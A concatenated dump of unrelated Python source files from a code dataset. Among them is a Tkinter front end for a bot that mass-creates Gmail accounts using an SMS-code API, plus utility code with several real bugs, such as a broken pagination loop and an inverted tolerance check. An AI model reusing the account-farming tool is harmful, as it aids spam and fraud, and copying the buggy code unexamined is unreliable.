\n\t\t\t\t{\n\t\t\t\t\t...\n\t\t\t\t}\n\t\t\t]\n\t\"\"\"\n\tnews_api_client = NewsApiClient(api_key=news_api_key)\n\n\tresponse = news_api_client.get_top_headlines(\n\t\tsources=source_id,\n\t\tpage_size=100,\n\t\tpage=1 # This is 1-indexed\n\t)\n\n\tif response[\"status\"] != \"ok\":\n\t\tlogger.exception(\"Error getting articles for {0}. Got the following return object: {1}\".format(\n\t\t\tsource_id,\n\t\t\tresponse\n\t\t), exc_info=True)\n\n\t\traise Exception(\"There was an error getting sources. See log.\")\n\t\n\t# Now, we need to check if we actually got all the top articles from this one request\n\t# response will contain a 'totalResults' field, which we can use to figure out if there are more we need to get\n\n\tcurr_articles = clean_top_articles(response[\"articles\"])\n\tnum_total_articles = int(response['totalResults'])\n\tcurr_page = 2\n\twhile num_total_articles < len(curr_articles):\n\t\tresponse = news_api_client.get_top_headlines(\n\t\t\tsources=source_id,\n\t\t\tpage_size=100,\n\t\t\tpage=2 # This is 1-indexed\n\t\t)\n\n\t\tif response[\"status\"] != \"ok\":\n\t\t\tlogger.exception(\"Error getting articles for {0}. Got the following return object: {1}\".format(\n\t\t\t\tsource_id,\n\t\t\t\tresponse\n\t\t\t), exc_info=True)\n\n\t\t\traise Exception(\"There was an error getting sources. 
See log.\")\n\t\telse:\n\t\t\tcurr_articles.extend(clean_top_articles(response['articles']))\n\t\t\tcurr_page += 1\n\n\treturn curr_articles\n\ndef clean_top_articles(articles):\n\t\"\"\"\n\tBefore: \n\t\t[\n\t\t\t{\n\t\t\t\t'source': {\n\t\t\t\t\t'id': 'abc-news', \n\t\t\t\t\t...\n\t\t\t\t}\n\t\t\t\t'author': 'John Parkinson', \n\t\t\t\t'title': \"Florida Bar looking at GOP ...\", \n\t\t\t\t'description': 'Florida Republican Rep. ...', \n\t\t\t\t'url': 'https://abcnews.go.com/Politics/florida-bar-gop-lawmakers-tweet-targeting-michael-cohen/story?id=62910364', \n\t\t\t\t'urlToImage': 'https://s.abcnews.com/images/Politics/matt-gaetz-epa-jef-190508_hpMain_16x9_992.jpg', \n\t\t\t\t'publishedAt': '2019-05-08T21:49:58Z', \n\t\t\t\t'content': 'Florida Republican Rep. Matt Gaetz is facing continued ... … [+3846 chars]'\n\t\t\t}, \n\t\t\t{\n\t\t\t\t...\n\t\t\t}\n\t\t]\n\n\tAfter:\n\t\t[\n\t\t\t{\n\t\t\t\t'source_id': 'abc-news', \n\t\t\t\t'author': 'John Parkinson', \n\t\t\t\t'title': \"Florida Bar looking at GOP ...\", \n\t\t\t\t'description': 'Florida Republican Rep. ...', \n\t\t\t\t'url': 'https://abcnews.go.com/Politics/florida-bar-gop-lawmakers-tweet-targeting-michael-cohen/story?id=62910364', \n\t\t\t\t'urlToImage': 'https://s.abcnews.com/images/Politics/matt-gaetz-epa-jef-190508_hpMain_16x9_992.jpg', \n\t\t\t\t'publishedAt': '2019-05-08T21:49:58Z', \n\t\t\t\t'content': 'Florida Republican Rep. Matt Gaetz is facing continued ... … [+3846 chars]'\n\t\t\t}, \n\t\t\t{\n\t\t\t\t...\n\t\t\t}\n\t\t]\n\n\t\"\"\"\n\n\tfor article in articles:\n\t\tsource_id = article['source']['id']\n\t\tdel article['source']\n\t\tarticle['source_id'] = source_id\n\t\n\treturn articles\n\n###############################\n# CONSTANTS\n###############################\n\nnews_api_categories = {\n \"business\",\n \"entertainment\",\n \"general\",\n \"health\",\n \"science\",\n \"sports\",\n \"technology\"\n}\n\nnews_api_languages = {\n \"ar\",\n \"de\",\n \"en\"\n \"es\",\n \"fr\",\n \"he\",\n \"it\",\n \"nl\",\n \"no\",\n \"pt\",\n \"ru\",\n \"se\",\n \"ud\",\n \"zh\"\n}\n\nnews_api_countries = {\n \"ae\",\n\t\"ar\",\n\t\"at\",\n\t\"au\",\n\t\"be\",\n\t\"bg\",\n\t\"br\",\n\t\"ca\",\n\t\"ch\",\n\t\"cn\",\n\t\"co\",\n\t\"cu\",\n\t\"cz\",\n\t\"de\",\n\t\"eg\",\n\t\"fr\",\n\t\"gb\",\n\t\"gr\",\n\t\"hk\",\n\t\"hu\",\n\t\"id\",\n\t\"ie\",\n\t\"il\",\n\t\"in\",\n\t\"it\",\n\t\"jp\",\n\t\"kr\",\n\t\"lt\",\n\t\"lv\",\n\t\"ma\",\n\t\"mx\",\n\t\"my\",\n\t\"ng\",\n\t\"nl\",\n\t\"no\",\n\t\"nz\",\n\t\"ph\",\n\t\"pl\",\n\t\"pt\",\n\t\"ro\",\n\t\"rs\",\n\t\"ru\",\n\t\"sa\",\n\t\"se\",\n\t\"sg\",\n\t\"si\",\n\t\"sk\",\n\t\"th\",\n\t\"tr\",\n\t\"tw\",\n\t\"ua\",\n\t\"us\",\n\t\"ve\",\n\t\"za\"\n}\n\n","sub_path":"news-worker/worker/utils/news_api.py","file_name":"news_api.py","file_ext":"py","file_size_in_byte":5345,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
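
# --- Added usage sketch (not part of the original module) ---
# How the two helpers above compose, assuming a valid NewsAPI key
# ("YOUR_KEY" below is a placeholder):
#
#     from news_api import get_all_sources, get_top_articles
#
#     sources = get_all_sources("YOUR_KEY")
#     for source in sources[:3]:
#         articles = get_top_articles(source["id"], "YOUR_KEY")
#         print(source["name"], len(articles))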
+{"seq_id":"608262620","text":"import cbtl_base\nfrom PIL import Image\n\ndef withinRange(px1,px2,tol):\n for i in range(2):\n if px1[i]-tol <= px2[i] <= px1[i]+tol:\n return False\n return True\n\ndef imgbool(img1,img2,tolerance):\n pmer = img1.load()\n cntre = img2.load()\n origmask = Image.new(\"RGBA\",img1.size,color = (0,0,0,0))\n mask = origmask.load()\n #thru all pixels: if they are not within tolerance range, write to mask.\n for y in range(img1.height):\n for x in range(img1.width):\n if not withinRange(pmer[x,y],cntre[x,y],tolerance):\n mask[x,y] = (0,0,0,255)\n #origmask.show()\n bg = Image.new(\"RGBA\",img1.size,color = (0,0,0,255))\n return Image.composite(bg,img2,mask = origmask)\n\nif __name__ == \"__main__\":\n intro1=Image.open(\"./intro1.png\")\n intro2=Image.open(\"./intro2.png\")\n imgbool(intro1,intro2,0).show()\n imgbool(intro1,intro2,2).show()\n imgbool(intro1,intro2,5).show()\n imgbool(intro1,intro2,15).show()\n","sub_path":"cbtl_bool.py","file_name":"cbtl_bool.py","file_ext":"py","file_size_in_byte":980,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"235098891","text":"import os\n\nfrom setuptools import setup, find_packages\n\nhere = os.path.abspath(os.path.dirname(__file__))\nREADME = open(os.path.join(here, 'README.rst')).read()\nCHANGES = open(os.path.join(here, 'CHANGES.txt')).read()\n\nrequires = [\n 'pyramid>=1.3a9',\n ]\nif not 'READTHEDOCS' in os.environ:\n # hail mary for readthedocs\n requires.extend(['ldappool', 'python-ldap'])\n\nsampleapp_extras = [\n 'waitress',\n 'pyramid_debugtoolbar',\n ]\ntesting_extras = ['nose', 'coverage']\ndocs_extras = ['Sphinx']\n\nsetup(name='pyramid_ldap',\n version='0.1',\n description='pyramid_ldap',\n long_description=README + '\\n\\n' + CHANGES,\n classifiers=[\n \"Programming Language :: Python\",\n \"Framework :: Pylons\",\n \"Programming Language :: Python :: 2.6\",\n \"Programming Language :: Python :: 2.7\",\n \"Topic :: System :: Systems Administration :: Authentication/Directory :: LDAP\",\n \"License :: Repoze Public License\",\n ],\n author='Chris McDonough',\n author_email='pylons-discuss@groups.google.com',\n url='http://pylonsproject.org',\n license=\"BSD-derived (http://www.repoze.org/LICENSE.txt)\",\n keywords='web pyramid pylons ldap',\n packages=find_packages(),\n include_package_data=True,\n zip_safe=False,\n install_requires=requires,\n tests_require=requires,\n extras_require = {\n 'sampleapp':sampleapp_extras,\n 'docs':docs_extras,\n 'testing':testing_extras,\n },\n test_suite=\"pyramid_ldap\",\n entry_points = \"\"\"\\\n [paste.app_factory]\n sampleapp = sampleapp:main\n \"\"\",\n )\n\n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1645,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"603565083","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.shortcuts import render, get_object_or_404\nfrom django.core.paginator import Paginator, EmptyPage, PageNotAnInteger\nfrom .models import Post\nfrom .forms import EmailPostForm\nfrom django.core.mail import send_mail\nfrom taggit.models import Tag\n\n# Create your views here.\ndef post_list(request, tag_slug=None):\n object_list=Post.published.all()\n tag = None\n\n if tag_slug:\n tag = get_object_or_404(Tag, slug=tag_slug)\n object_list = object_list.filter(tags__in=[tag])\n\n paginator = Paginator(object_list, 3)#3 posts in each page\n page = request.GET.get('page')\n try:\n \tposts = paginator.page(page)\n except PageNotAnInteger:\n \t#if page is not an integer deliver the first page\n \tposts = paginator.page(1)\n except EmptyPage:\n \t#if page is out of range deliver last page of results\n \tposts = paginator.page(paginator.num_pages)\n return render(request, 'blog/post/list.html', {'page':page, 'posts':posts, 'tag':tag, 'active_blog': True})\n\ndef post_detail(request, year, month, day, post):\n\tpost = get_object_or_404(Post, slug=post,\n\t\tstatus='published',\n\t\tpublish__year=year,\n\t\tpublish__month=month,\n\t\tpublish__day=day)\n\treturn render(request, 'blog/post/detail.html', {'post':post, 'active_blog': True})\n\n\ndef post_share(request, post_id):\n # Retrieve post by id\n post = get_object_or_404(Post, id=post_id, status='published')\n sent = False\n\n if request.method == 'POST':\n # Form was submitted\n form = EmailPostForm(request.POST)\n if form.is_valid():\n # Form fields passed validation\n cd = form.cleaned_data\n post_url = request.build_absolute_uri(post.get_absolute_url())\n subject = '{} ({}) recommends you reading \"{}\"'.format(cd['name'], cd['email'], post.title)\n message = 'Read \"{}\" at {}\\n\\n{}\\'s comments: {}'.format(post.title, post_url, cd['name'], cd['comments'])\n send_mail(subject, message, 'admin@myblog.com', [cd['to']])\n sent = True\n else:\n \n if request.user.is_authenticated():\n form = EmailPostForm(initial = {'email': request.user.email, 'name': request.user.get_full_name()})\n else:\n form = EmailPostForm()\n\n return render(request, 'blog/post/share.html', {'post': post,\n 'form': form,\n 'sent': sent, 'active_blog': True})","sub_path":"blog/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2529,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"653368522","text":"\n# 使用python自带的函数heapq完成堆排序\n\nimport heapq\nimport random\n\nli = list(range(100))\nrandom.shuffle(li)\nprint(li)\n\nheapq.heapify(li) # 建堆(小根堆)\nprint(li)\n\nn = len(li)\nfor i in range(n):\n print(heapq.heappop(li),end=\",\")","sub_path":"排序方法/python堆排序.py","file_name":"python堆排序.py","file_ext":"py","file_size_in_byte":249,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"476915279","text":"import os\nimport sys\nfrom os import listdir\nfrom os.path import isfile, join\nimport threading\nimport datetime\nimport configparser\nimport tkinter as tk\nfrom tkinter.scrolledtext import ScrolledText\nfrom tkinter.ttk import Notebook\nfrom tkinter import messagebox\nfrom selenium.common.exceptions import WebDriverException\n\nimport helper\nfrom gbot import Gbot\n\nclass Facade(tk.Tk):\n\tdef __init__(self):\n\t\tsuper().__init__()\n\n\t\tself.title('Gbot')\n\t\tself.geometry('600x600')\n\t\tself.head_font = ('Verdana', 12)\n\t\tself.gbot = None\t\n\t\tself.config = configparser.ConfigParser()\n\t\tself.configfile = helper.resource_path('config.ini')\n\t\tself.accounts_dir = helper.resource_path('results')\n\t\tself.namesfile = helper.resource_path('names.txt')\n\n\t\tself.current_date = datetime.datetime.now()\n\t\tself.current_date = self.current_date.strftime(\"%Y-%m-%d\")\n\t\t\n\t\ttab_control = Notebook(self)\n\t\tself.main(tab_control)\n\t\tself.accounts(tab_control)\n\t\tself.names(tab_control)\n\t\tself.configs(tab_control)\n\n\tdef main(self, tab_control):\n\t\tmain_tab = tk.Frame(tab_control)\n\t\ttab_control.add(main_tab, text='Главная')\n\t\ttab_control.pack(expand=True, fill=tk.BOTH)\n \n\t\tyes_sign = tk.PhotoImage(file=helper.resource_path('img/yes_sign.png'))\n\n\t\tself.accounts_amount = tk.IntVar()\n\t\tself.accounts_amount.set(10)\n\n\t\ttk.Label(main_tab, font=self.head_font, text='Лог:')\\\n\t\t\t.pack(side=tk.TOP, anchor=tk.NW, pady=(20, 0), padx=(5, 0))\n\t\tself.log_list_field = ScrolledText(main_tab, height=20)\n\t\tself.log_list_field.pack(fill=tk.X, padx=5)\n\n\t\ttk.Label(main_tab, font=self.head_font, text='Сколько аккаунтов создать:')\\\n\t\t\t.pack(side=tk.TOP, anchor=tk.NW, pady=(40, 0), padx=(5, 0))\n\t\taccounts_amount_field = tk.Entry(main_tab, textvariable=self.accounts_amount, width=30)\n\t\taccounts_amount_field.pack(side=tk.TOP, anchor=tk.NW, padx=(5, 0))\n\n\t\tself.start_btn = tk.Button(main_tab, text='Начать', command=self.on_start, width=30, height=2)\n\t\tself.start_btn.pack(side=tk.LEFT, anchor=tk.NW, pady=(30, 0), padx=(5, 0))\n\n\t\tstop_btn = tk.Button(main_tab, text='Стоп', command=self.on_stop, width=30, height=2)\n\t\tstop_btn.pack(side=tk.RIGHT, anchor=tk.NW, pady=(30, 0), padx=(0, 5))\n\n\tdef accounts(self, tab_control):\n\t\taccounts_tab = tk.Frame(tab_control)\n\t\ttab_control.add(accounts_tab, text='Аккаунты')\n\t\ttab_control.pack(expand=True, fill=tk.BOTH)\n\n\t\ttk.Label(accounts_tab, font=self.head_font, text='Созданные аккаунты gmail:')\\\n\t\t\t.pack(side=tk.TOP, anchor=tk.NW, pady=(20, 0), padx=(5, 0))\n\t\tself.accounts_list_field = ScrolledText(accounts_tab)\n\t\tself.accounts_list_field.pack(expand=True, fill=tk.BOTH, pady=(0, 20), padx=5)\n\n\t\tcopy_btn = tk.Button(accounts_tab, text='Скопировать все', command=self.on_copy_accounts)\n\t\tcopy_btn.pack(side=tk.LEFT, padx=(5, 0), pady=(0, 10))\n\n\t\tcopy_today_btn = tk.Button(accounts_tab, text='Скопировать сегодняшние', command=self.on_copy_today_accounts)\n\t\tcopy_today_btn.pack(side=tk.LEFT, padx=(5, 0), pady=(0, 10))\n\n\t\tclear_btn = tk.Button(accounts_tab, text='Очистить все', command=self.on_clear_accounts)\n\t\tclear_btn.pack(side=tk.RIGHT, padx=(0, 5), pady=(0, 10))\n\t\t\n\t\tself.accounts_file = open(join(self.accounts_dir, self.current_date + '.txt'), 'a+')\n\n\t\tself.accounts_list = []\n\n\t\tfor file in listdir(self.accounts_dir):\n\t\t\tif isfile(join(self.accounts_dir, file)):\n\t\t\t\t_, file_ext = 
os.path.splitext(file)\n\t\t\t\tif file_ext == '.txt':\n\t\t\t\t\tself.accounts_list.append(join(self.accounts_dir, file))\n\n\t\tself.accounts_list.sort(key=lambda x: x.split('-'), reverse=True)\n\n\t\tfor file in self.accounts_list:\n\t\t\taccounts = open(file, 'r')\n\t\t\tfile_name, _ = os.path.splitext(file)\n\t\t\tfile_name_chunks = file_name.split(os.sep)\n\t\t\tfile_name = file_name_chunks[-1]\n\t\t\tfor account in accounts:\n\t\t\t\tself.accounts_list_field.insert(tk.END, file_name + ' | ' + account)\n\n\tdef names(self, tab_control):\n\t\tnames_tab = tk.Frame(tab_control)\n\t\ttab_control.add(names_tab, text='Имена')\n\t\ttab_control.pack(expand=True, fill=tk.BOTH)\n\n\t\ttk.Label(names_tab, font=self.head_font, text='Имена:')\\\n\t\t\t.pack(side=tk.TOP, anchor=tk.NW, pady=(20, 0), padx=(5, 0))\n\t\tself.names_list_field = ScrolledText(names_tab)\n\t\tself.names_list_field.pack(expand=True, fill=tk.BOTH, pady=(0, 20), padx=5)\n\n\t\tnames = open(self.namesfile, 'r')\n\n\t\tfor name in names:\n\t\t\tself.names_list_field.insert(tk.END, name)\n\n\t\tsave_btn = tk.Button(names_tab, text='Сохранить', command=self.on_save_names, width=30, height=2)\n\t\tsave_btn.pack(side=tk.BOTTOM, anchor=tk.NE, padx=(0, 5), pady=(30, 10))\n\n\tdef configs(self, tab_control):\n\t\tconfigs_tab = tk.Frame(tab_control)\n\t\ttab_control.add(configs_tab, text='Настройки')\n\t\ttab_control.pack(expand=True, fill=tk.BOTH)\n\n\t\tself.config.read(self.configfile)\n\t\tself.api_key = tk.StringVar()\n\t\tself.wait_code_time = tk.IntVar()\n\t\tself.request_for_code_time = tk.IntVar()\n\t\tself.backup_email = tk.StringVar()\n\t\tself.wait_element_time = tk.IntVar()\n\t\tself.wait_page_reload_time = tk.IntVar()\n\n\t\tself.api_key.set(self.config['api']['api_key'])\n\t\tself.wait_code_time.set(self.config['api']['wait_code_time'])\n\t\tself.request_for_code_time.set(self.config['api']['request_for_code_time'])\n\t\tself.backup_email.set(self.config['user_data']['backup_email'])\n\t\tself.wait_element_time.set(self.config['app']['wait_element_time'])\n\t\tself.wait_page_reload_time.set(self.config['app']['wait_page_reload_time'])\n\n\t\tfields = [\n\t\t\t[\n\t\t\t\ttk.Label(configs_tab, text='Api ключ'), \n\t\t\t\ttk.Entry(configs_tab, textvariable=self.api_key, width=35)\n\t\t\t],\n\t\t\t[\n\t\t\t\ttk.Label(configs_tab, text='Время ожидания смс кода'), \n\t\t\t\ttk.Entry(configs_tab, textvariable=self.wait_code_time, width=35)\n\t\t\t],\n\t\t\t[\n\t\t\t\ttk.Label(configs_tab, text='Время ожидания перед запросом\\nсмс кода'), \n\t\t\t\ttk.Entry(configs_tab, textvariable=self.request_for_code_time, width=35)\n\t\t\t],\n\t\t\t[\n\t\t\t\ttk.Label(configs_tab, text='Email адресс для восстановления'),\n\t\t\t\ttk.Entry(configs_tab, textvariable=self.backup_email, width=35)\n\t\t\t],\n\t\t\t[\n\t\t\t\ttk.Label(configs_tab, text='Время ожидания появления\\n элемента'),\n\t\t\t\ttk.Entry(configs_tab, textvariable=self.wait_element_time, width=35)\n\t\t\t],\n\t\t\t[\n\t\t\t\ttk.Label(configs_tab, text='Время ожидания перед\\n перезагрузкой страницы'),\n\t\t\t\ttk.Entry(configs_tab, textvariable=self.wait_page_reload_time, width=35)\n\t\t\t]\n\t\t]\n\n\t\ti = 0\n\t\tfor field in fields:\n\t\t\tfield[0].grid(row=i, column=0, padx=5, pady=15)\n\t\t\tfield[1].grid(row=i, column=1, padx=5, pady=15)\n\t\t\ti += 1\n\n\t\tsave_btn = tk.Button(configs_tab, text='Сохранить', command=self.on_save_accounts, width=30, height=2)\n\t\tsave_btn.place(relx=0.991, rely=0.982, anchor=tk.SE)\n\n\tdef 
on_save_accounts(self):\n\t\tself.config['api'] = {\n\t\t\t'api_key': self.api_key.get(),\n\t\t\t'wait_code_time': self.wait_code_time.get(),\n\t\t\t'request_for_code_time': self.request_for_code_time.get()\n\t\t}\n\n\t\tself.config['user_data'] = {\n\t\t\t'backup_email': self.backup_email.get()\n\t\t}\n\n\t\tself.config['app'] = {\n\t\t\t'wait_element_time': self.wait_element_time.get(),\n\t\t\t'wait_page_reload_time': self.wait_page_reload_time.get()\n\t\t}\n\n\t\twith open(self.configfile, 'w+') as configfile:\n\t\t\tself.config.write(configfile)\n\t\t\tself.dialog('Уведомление', 'Настройки были успешно сохранены.')\n\n\tdef on_copy_accounts(self):\n\t\tself.clipboard_append(self.accounts_list_field.get('1.0', tk.END))\n\t\tself.dialog('Уведомление', 'Аккаунты были скопированы.\\nCTRL + V чтобы вставить.')\n\n\tdef on_copy_today_accounts(self):\n\t\taccounts_list = self.accounts_list_field.get('1.0', tk.END).split('\\n')\n\t\tcurrent_accounts_list = []\n\n\t\tfor account in accounts_list:\n\t\t\taccount_chunks = account.split(' | ')\n\t\t\tif account_chunks[0] == self.current_date:\n\t\t\t\tcurrent_accounts_list.append(' | '.join(account_chunks))\n\n\t\tcurrent_accounts_list = '\\n'.join(current_accounts_list)\n\n\t\tif not current_accounts_list:\n\t\t\tself.dialog('Уведомление', 'Вы не создали ни один аккаунт сегодня.')\n\t\telse:\n\t\t\tself.clipboard_append(current_accounts_list)\n\t\t\tself.dialog('Уведомление', 'Аккаунты были скопированы.\\nCTRL + V чтобы вставить.')\n\n\tdef dialog(self, title, message):\n\t\twindow = tk.Toplevel(menu='sdf')\n\t\twindow.geometry('%dx%d+%d+%d' % (300, 150, \n\t\t\tself.winfo_x() + (self.winfo_width() / 4), \n\t\t\tself.winfo_y() + (self.winfo_height() / 4))\n\t\t)\n\t\twindow.title(title)\n\t\ttk.Message(window, text=message, font=('Verdana', 15), width=300)\\\n\t\t\t.pack(side=tk.TOP, anchor=tk.CENTER, pady=5)\n\t\ttk.Button(window, text='OK', width=20, command=lambda: window.destroy())\\\n\t\t\t.pack(side=tk.BOTTOM, anchor=tk.CENTER, pady=(0, 10))\n\n\t\twindow.after(3000, lambda: window.destroy())\n\t\treturn window\n\n\tdef on_clear_accounts(self):\n\t\tfor account in self.accounts_list:\n\t\t\tself.accounts_list_field.delete('1.0', tk.END)\n\t\t\tself.dialog('Уведомление', 'Аккаунты удалены.')\n\t\t\tos.remove(account)\n\n\tdef on_save_names(self):\n\t\tnames_list = self.names_list_field.get('1.0', tk.END).split('\\n')\n\t\tnames_list = list(filter(None, names_list))\n\t\tnames_list = [name.strip() for name in names_list]\n\t\tnames_list = '\\n'.join(names_list)\n\n\t\tnames = open(self.namesfile, 'w+')\n\t\tnames.write(names_list)\n\t\tnames.close()\n\t\tself.dialog('Уведомление', 'Имена были успешно сохранены.')\n\n\tdef on_start(self):\n\t\tthreading.Thread(target=self.gbot_start).start()\n\n\tdef on_stop(self):\n\t\tif self.gbot != None:\n\t\t\tself.gbot.destroy()\n\n\t\tself.start_btn.configure(state='normal')\n\n\tdef gbot_start(self):\n\t\ttry:\n\t\t\tself.start_btn.configure(state='disabled')\n\t\t\tself.gbot = Gbot(\n\t\t\t\tlambda message: self.logger(message),\n\t\t\t\tlambda account: self.add_account(account)\n\t\t\t)\n\t\t\tself.gbot.prepare()\n\t\t\tself.gbot.launch(self.accounts_amount.get())\n\t\texcept WebDriverException:\n\t\t\tself.start_btn.configure(state='normal')\n\n\tdef logger(self, message):\n\t\tself.log_list_field.insert(tk.END, message + '\\n')\n\t\tself.log_list_field.see(tk.END)\n\n\tdef add_account(self, account):\n\t\tself.accounts_file.write(account + '\\n')\n\t\tself.accounts_list_field.insert(tk.END, account 
+ '\\n')\n\t\tself.accounts_list_field.see(tk.END)\n\nif __name__ == '__main__':\n\tfacade = Facade()\n\tfacade.mainloop()","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":10425,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
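
# --- Added note and sketch (not part of the original file) ---
# `gbot_start` runs on a worker thread, but `logger`/`add_account` touch Tk
# widgets directly; Tkinter is not thread-safe, so a common fix is to push
# messages onto a queue and drain it on the GUI thread with `after()`.
# A minimal sketch of that pattern (hypothetical class and names, for illustration):

import queue
import threading
import tkinter as tk

class ThreadSafeLog(tk.Tk):
    def __init__(self):
        super().__init__()
        self.text = tk.Text(self)
        self.text.pack()
        self.messages = queue.Queue()
        self.after(100, self.drain)  # poll the queue on the GUI thread
        threading.Thread(target=self.worker, daemon=True).start()

    def worker(self):
        # Safe: the worker only touches the queue, never the widgets
        for i in range(5):
            self.messages.put("message {0}".format(i))

    def drain(self):
        # Runs on the GUI thread, so widget access here is safe
        while not self.messages.empty():
            self.text.insert(tk.END, self.messages.get() + "\n")
        self.after(100, self.drain)

# ThreadSafeLog().mainloop()  # run the demo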
+{"seq_id":"196952285","text":"import os, random\nimport io\nimport numpy as np\nfrom PIL import Image\n\n\nclass BlackBox():\n\n def __init__(self,shredded_path,orig_path):\n self.shredded_image=Image.open(shredded_path)\n self.original_image=Image.open(orig_path)\n self.blocks=self.create_blocks()\n\n def PIL2array(self,img):\n return np.array(img.getdata(),\n np.uint8).reshape(img.size[1], img.size[0],1)\n\n def array2PIL(self,arr, size):\n mode = 'L'\n arr = arr.reshape(arr.shape[0]*arr.shape[1], arr.shape[2])\n if len(arr[0]) == 3:\n arr = np.c_[arr, 255*np.ones((len(arr),1), np.uint8)]\n return Image.frombuffer(mode, size, arr.tostring(), 'raw', mode, 0, 1)\n\n\n\n def create_blocks(self): \n blocks=[] \n for i in range(1,129): \n blocks.append(list(range((i-1)*5,i*5))) \n return blocks \n\n\n def swap(self,indexes,matrix):\n permutation=[]\n for i in indexes:\n permutation.extend(self.blocks[i])\n return matrix[:,permutation]\n\n def evaluate_solution(self,permutation):\n if len(permutation) != len(self.blocks):\n raise Exception(\"Size of permutation list is wrong. It should be {0}\".format(len(self.blocks)))\n \n origin_matrix=self.PIL2array(self.original_image)\n np_matrix=self.PIL2array(self.shredded_image)\n np_matrix=self.swap(permutation,np_matrix)\n return np.sum(np.abs(np_matrix-origin_matrix))\n\n\n def show_solution(self,permutation, record=None):\n if not isinstance(permutation,list):\n raise Exception(\"You should provide a permutation list\")\n np_matrix=self.PIL2array(self.shredded_image)\n np_matrix=self.swap(permutation,np_matrix)\n new_image=self.array2PIL(np_matrix,self.original_image.size)\n if record is None:\n new_image.show()\n else:\n new_image.save(record)\n \n\n\n\n","sub_path":"blackbox.py","file_name":"blackbox.py","file_ext":"py","file_size_in_byte":2214,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"386089093","text":"import argparse\n\nfrom core_data_modules.logging import Logger\nfrom core_data_modules.traced_data.io import TracedDataJsonIO\nfrom core_data_modules.util import IOUtils\n\nfrom src import LoadData, TranslateRapidProKeys, AutoCode, ProductionFile, \\\n ApplyManualCodes, AnalysisFile, WSCorrection\nfrom src.lib import PipelineConfiguration, MessageFilters\n\nlog = Logger(__name__)\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser(description=\"Runs the post-fetch phase of the pipeline\")\n\n parser.add_argument(\"user\", help=\"User launching this program\")\n parser.add_argument(\"pipeline_run_mode\", help=\"whether to generate analysis files or not\",\n choices=[\"all-stages\", \"auto-code-only\"])\n parser.add_argument(\"pipeline_configuration_file_path\", metavar=\"pipeline-configuration-file\",\n help=\"Path to the pipeline configuration json file\")\n\n parser.add_argument(\"raw_data_dir\", metavar=\"raw-data-dir\",\n help=\"Path to a directory containing the raw data files exported by fetch_raw_data.py\")\n parser.add_argument(\"prev_coded_dir_path\", metavar=\"prev-coded-dir-path\",\n help=\"Directory containing Coda files generated by a previous run of this pipeline. \"\n \"New data will be appended to these files.\")\n\n parser.add_argument(\"auto_coding_json_output_path\", metavar=\"auto-coding-json-output-path\",\n help=\"Path to a JSON file to write the TracedData associated with auto-coding stage of the pipeline\")\n parser.add_argument(\"messages_json_output_path\", metavar=\"messages-json-output-path\",\n help=\"Path to a JSONL file to write the TracedData associated with the messages analysis file\")\n parser.add_argument(\"individuals_json_output_path\", metavar=\"individuals-json-output-path\",\n help=\"Path to a JSONL file to write the TracedData associated with the individuals analysis file\")\n parser.add_argument(\"icr_output_dir\", metavar=\"icr-output-dir\",\n help=\"Directory to write CSV files to, each containing 200 messages and message ids for use \" \n \"in inter-code reliability evaluation\"),\n parser.add_argument(\"coded_dir_path\", metavar=\"coded-dir-path\",\n help=\"Directory to write coded Coda files to\")\n parser.add_argument(\"csv_by_message_output_path\", metavar=\"csv-by-message-output-path\",\n help=\"Analysis dataset where messages are the unit for analysis (i.e. one message per row)\")\n parser.add_argument(\"csv_by_individual_output_path\", metavar=\"csv-by-individual-output-path\",\n help=\"Analysis dataset where respondents are the unit for analysis (i.e. 
one respondent \"\n \"per row, with all their messages joined into a single cell)\")\n parser.add_argument(\"production_csv_output_path\", metavar=\"production-csv-output-path\",\n help=\"Path to a CSV file to write raw message and demographic responses to, for use in \"\n \"radio show production\"),\n\n args = parser.parse_args()\n\n pipeline_run_mode = args.pipeline_run_mode\n user = args.user\n pipeline_configuration_file_path = args.pipeline_configuration_file_path\n\n raw_data_dir = args.raw_data_dir\n prev_coded_dir_path = args.prev_coded_dir_path\n\n auto_coding_json_output_path = args.auto_coding_json_output_path\n messages_json_output_path = args.messages_json_output_path\n individuals_json_output_path = args.individuals_json_output_path\n icr_output_dir = args.icr_output_dir\n coded_dir_path = args.coded_dir_path\n csv_by_message_output_path = args.csv_by_message_output_path\n csv_by_individual_output_path = args.csv_by_individual_output_path\n production_csv_output_path = args.production_csv_output_path\n\n # Load the pipeline configuration file\n log.info(\"Loading Pipeline Configuration File...\")\n with open(pipeline_configuration_file_path) as f:\n pipeline_configuration = PipelineConfiguration.from_configuration_file(f)\n Logger.set_project_name(pipeline_configuration.pipeline_name)\n log.debug(f\"Pipeline name is {pipeline_configuration.pipeline_name}\")\n\n log.info(\"Loading the raw data...\")\n data = LoadData.load_raw_data(user, raw_data_dir, pipeline_configuration)\n\n log.info(\"Translating Rapid Pro Keys...\")\n data = TranslateRapidProKeys.translate_rapid_pro_keys(user, data, pipeline_configuration)\n\n if pipeline_configuration.move_ws_messages:\n log.info(\"Pre-filtering empty message objects...\")\n # This is a performance optimisation to save execution time + memory when moving WS messages, by removing\n # the need to mark and process a high volume of empty message objects as 'NR' in WS correction.\n # Empty message objects represent flow runs where the participants never sent a message e.g. 
